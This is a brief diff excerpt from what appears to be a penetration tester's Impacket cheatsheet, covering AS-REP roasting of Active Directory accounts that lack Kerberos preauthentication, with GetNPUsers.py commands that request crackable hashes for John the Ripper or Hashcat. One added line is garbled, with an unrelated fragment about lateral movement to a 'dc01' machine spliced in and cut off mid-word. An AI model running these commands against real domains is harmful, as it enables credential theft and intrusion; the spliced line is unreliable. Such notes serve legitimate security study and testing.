7RU7H/Archive/Tools/Impacket/Impacket-Cheatsheet.md

 For users that do not require Kerberos preauthentiation:
 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).
-Output is compatible with JtR:[[John-The-Ripper-Cheatsheet]] use `-format hashcat` for  hashcat:[[Hashcat-Cheatsheet]]
+Output is compatible with JtR:[[John-The-Ripper-Cheatsheet]] use `-format hashcat` for  hashcat:[[Hashcat-Cheatsheet]] order to get access to the dc01 machine, we need to perform a lateral movement attack that we l
 ```bash
 GetNPUsers.py  -dc-ip $IP -request '$domain/'
 GetNPUsers.py  -dc-ip $IP -request '$domain/' -format hashcat